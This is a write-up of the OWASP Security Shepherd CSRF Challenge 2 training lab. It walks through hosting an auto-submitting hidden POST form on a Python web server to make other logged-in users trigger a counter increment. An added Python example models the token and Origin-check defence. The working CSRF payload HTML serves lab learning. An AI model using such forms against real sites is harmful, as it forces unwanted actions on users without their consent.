OWASP Security Shepherd Project - CSRF 2 (CSRF Challenge)

Challenge


Solution

    In this challenge, we need to force other users to send a POST request that increases our counter. It is quite similar to challenge 1, except that the request is now a POST instead of a GET.
    Before we can deliver a POST request through other users, we need a web server. POST requests are a little more awkward than GET requests: we can't just embed one in an image or another web resource. We need to build a form and make it submit automatically.
    Fortunately, Python gives us a very easy way to stand up a temporary web server! Just run commands similar to the following:
    1. mkdir /root/Desktop/temp
    2. cd /root/Desktop/temp
    3. python -m SimpleHTTPServer <port to listen>
        (-m means "run the named module"; SimpleHTTPServer is the module name)

    Now we have a web server listening on <port to listen> that uses /root/Desktop/temp as its document root!
    Next, we need to design the POST form for other users. We can reuse the code provided in the CSRF lesson:
<form name="csrfForm" action="http://www.secureBank.ie/sendMoney" method="POST">
    <input type="hidden" name="giveMoneyTo" value="hacker" /> 
    <input type="hidden" name="giveAmount" value="1000" /> 
    <input type="submit"/> 
</form> 
<script> document.csrfForm.submit(); </script>
    However, we need to modify it to POST to /user/csrfchallengetwo/plusplus with the parameter userId set to ourId.
    As a result, the form should look like the following:
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengetwo/plusplus" method="POST">
    <input type="hidden" name="userId" value="ourId" />
    <input type="submit"/> 
</form> 
<script> document.evilForm.submit(); </script>
    Now only one question is left: what exactly is ourId?
To answer it, let's see what we can find in BurpSuite.

Nothing~lol
Maybe it will be the same as challenge 1 which is 637e8d2e65542fe82fe6da3b0356bc0865b0b791?
    That would make our form the following:
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengetwo/plusplus" method="POST">
    <input type="hidden" name="userId" value="637e8d2e65542fe82fe6da3b0356bc0865b0b791" />
    <input type="submit"/> 
</form> 
<script> document.evilForm.submit(); </script> 
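The form above works because the endpoint identifies the user purely from the session cookie the browser attaches automatically; nothing in the request proves it came from a page the site itself served, which is the weakness this CSRF challenge is about. The following is an added example, not code from this post or from Security Shepherd: it models the challenge endpoint as a Python function, feeds it a request shaped like the auto-submitting form, and contrasts it with a hardened version that applies a synchronizer token plus an Origin check. The cookie name JSESSIONID, the session store, the request dictionaries and the tokens are all assumptions constructed for illustration.

```python
"""Added example, not code from the original post or from Security Shepherd.
It models the challenge endpoint as a Python function, feeds it a request
shaped like the auto-submitting form above, and contrasts it with a version
that applies a synchronizer token and an Origin check. Every cookie value,
token and header below is constructed for illustration."""
import hmac
import secrets
from urllib.parse import urlparse

# Origin of the application under test; taken from the form's action URL.
APP_ORIGIN = "https://192.168.1.5"


def vulnerable_plusplus(request, sessions):
    """Models /user/csrfchallengetwo/plusplus as the challenge exposes it:
    the browser-attached session cookie identifies the victim, and the
    userId from the form body is incremented. Nothing proves the POST came
    from a page this site served, so a form hosted elsewhere is accepted."""
    session = sessions.get(request["cookies"].get("JSESSIONID"))
    if session is None:
        return 401, "not logged in"
    return 200, f"incremented counter of {request['form']['userId']}"


def issue_csrf_token(session):
    """Synchronizer-token pattern: a random per-session token is stored
    server-side and embedded as a hidden field in the site's own forms."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def hardened_plusplus(request, sessions):
    """Same endpoint with two independent checks. The Origin (or Referer)
    header must name this site, and the form must carry the session's
    CSRF token. A page on the attacker's web server fails both: the browser
    stamps it with the attacker's origin, and the attacker never sees the
    token that lives in the victim's session."""
    session = sessions.get(request["cookies"].get("JSESSIONID"))
    if session is None:
        return 401, "not logged in"
    origin = request["headers"].get("Origin") or request["headers"].get("Referer")
    if not origin:
        return 403, "missing Origin/Referer"
    parsed = urlparse(origin)
    if f"{parsed.scheme}://{parsed.netloc}" != APP_ORIGIN:
        return 403, "cross-site request rejected"
    submitted = request["form"].get("csrfToken", "")
    expected = session.get("csrf_token", "")
    if not expected or not hmac.compare_digest(submitted, expected):
        return 403, "bad CSRF token"
    return 200, f"incremented counter of {request['form']['userId']}"


def run_scenarios():
    """Constructed scenario: a logged-in victim, the cross-site POST that the
    form above produces, and a legitimate same-site POST for comparison."""
    # Constructed session store: cookie value -> server-side session.
    sessions = {"SESSION-victim": {"user": "victim"}}
    victim = sessions["SESSION-victim"]
    legit_token = issue_csrf_token(victim)

    # What the victim's browser sends after loading the attacker-hosted page:
    # session cookie attached automatically, Origin set to the attacker's
    # host, and no CSRF token in the body.
    cross_site = {
        "headers": {"Origin": "http://192.168.1.6:7724"},
        "cookies": {"JSESSIONID": "SESSION-victim"},
        "form": {"userId": "637e8d2e65542fe82fe6da3b0356bc0865b0b791"},
    }
    # The same action submitted from a form the site itself rendered.
    same_site = {
        "headers": {"Origin": APP_ORIGIN},
        "cookies": {"JSESSIONID": "SESSION-victim"},
        "form": {"userId": "637e8d2e65542fe82fe6da3b0356bc0865b0b791",
                 "csrfToken": legit_token},
    }
    return {
        "vulnerable_cross_site": vulnerable_plusplus(cross_site, sessions),
        "hardened_cross_site": hardened_plusplus(cross_site, sessions),
        "hardened_same_site": hardened_plusplus(same_site, sessions),
    }


if __name__ == "__main__":
    for name, (status, msg) in run_scenarios().items():
        print(f"{name}: {status} {msg}")
```

The two checks are deliberately independent: the Origin check stops the request even if a token ever leaks, and the token check stops it even when a client omits the Origin and Referer headers. Marking the session cookie SameSite=Lax is a third, browser-enforced layer, since a top-level cross-site POST would then be sent without the cookie at all.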
    Next, we need to put the form into a simple HTML web page. We can google "HTML Web page Sample" and find an example of a simple HTML page. Now we slightly modify the sample page and put our form into it as follows:
    1. vim peter.html
    2. Press i for insert mode
    3. Input the following:

<HTML>
<HEAD>
<TITLE>Peter's Playground</TITLE>
</HEAD>
<BODY>
<H1>This is a Header</H1>
<H2>This is a Medium Header</H2>
<P> This is a new paragraph!
<P> <B>This is a new paragraph!</B>
<BR> <B><I>This is a new sentence without a paragraph break, in bold italics.</I></B>
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengetwo/plusplus" method="POST">
    <input type="hidden" name="userId" value="637e8d2e65542fe82fe6da3b0356bc0865b0b791" />
    <input type="submit"/>
</form>
<script> document.evilForm.submit(); </script>

</BODY>
</HTML>


    Then, let's submit the URL of our web page (e.g. http://192.168.1.6:7724/peter.html). After that, let's log out and log in with another user's account to see what happens!

    It seems that we have successfully increased the counter! Let's log back in to the original account to see whether we pass.


    This completes the challenge : -)
